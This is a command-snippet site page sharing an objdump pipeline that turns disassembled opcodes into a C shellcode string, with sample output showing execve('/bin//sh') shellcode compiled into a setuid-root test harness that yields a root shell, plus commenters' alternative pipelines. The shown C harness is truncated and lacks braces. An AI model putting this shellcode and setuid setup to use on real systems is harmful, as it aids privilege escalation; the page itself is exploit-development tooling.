Get all shellcode on binary file from objdump

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Tired copy paste to get opcode from objdump huh ? Get more @
Sample Output
gunslinger@localhost:~/$ objdump -d shell

shell:     file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
 8048060:	31 c0                	xor    %eax,%eax
 8048062:	31 db                	xor    %ebx,%ebx
 8048064:	31 c9                	xor    %ecx,%ecx
 8048066:	31 d2                	xor    %edx,%edx
 8048068:	b0 46                	mov    $0x46,%al
 804806a:	31 db                	xor    %ebx,%ebx
 804806c:	31 c9                	xor    %ecx,%ecx
 804806e:	cd 80                	int    $0x80
 8048070:	b0 0b                	mov    $0xb,%al
 8048072:	53                   	push   %ebx
 8048073:	68 2f 2f 73 68       	push   $0x68732f2f
 8048078:	68 2f 62 69 6e       	push   $0x6e69622f
 804807d:	89 e3                	mov    %esp,%ebx
 804807f:	31 c9                	xor    %ecx,%ecx
 8048081:	31 c9                	xor    %ecx,%ecx
 8048083:	53                   	push   %ebx
 8048084:	cd 80                	int    $0x80
gunslinger@localhost:~/$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"

int main(void)
	(*(void(*)()) shellcode)();

root@localhost:/home/gunslinger/# vim shellcodetest.c
root@localhost:/home/gunslinger/# cat shellcodetest.c
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"

int main(void)
	(*(void(*)()) shellcode)();
root@localhost:/home/gunslinger/# gcc -o shellcodetest shellcodetest.c
root@localhost:/home/gunslinger/# chown root:root shellcodetest.c
root@localhost:/home/gunslinger/# chmod 4755 shellcodetest
root@localhost:/home/gunslinger/# exit
gunslinger@localhost:~/$ ./shellcodetest
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
# exit

2 Alternatives + Submit Alt

What Others Think

This is better and does not rely on field widths remaining constant between objdump changes. for i in `objdump -d prog | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
lodsb · 368 weeks and 3 days ago
for zsh users: for i in `objdump -d prog | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\\\x$i" ; done
akshaykrishnanr · 302 weeks and 1 day ago
@lodsb your version breaks with filenames containing spaces and letter from 0-9a-f range. For example with file named 'ab\ 23\ ' both ab and 23 will be included as opcodes. So `grep -v 'file'` is a must.
reiderroque · 236 weeks ago
Also the command at the top will fail with binaries using 'file' as a label and referencing it with a jump. That is opcodes generated by, e.g. 'jz file' instruction will fall out. Though if labels are removed with, e.g. strip --strip-unneeded, it won't be an issue.
reiderroque · 236 weeks ago

What do you think?

Any thoughts on this command? Does it work on your machine? Can you do the same thing with only 14 characters?

You must be signed in to comment.

What's this? is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.


Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: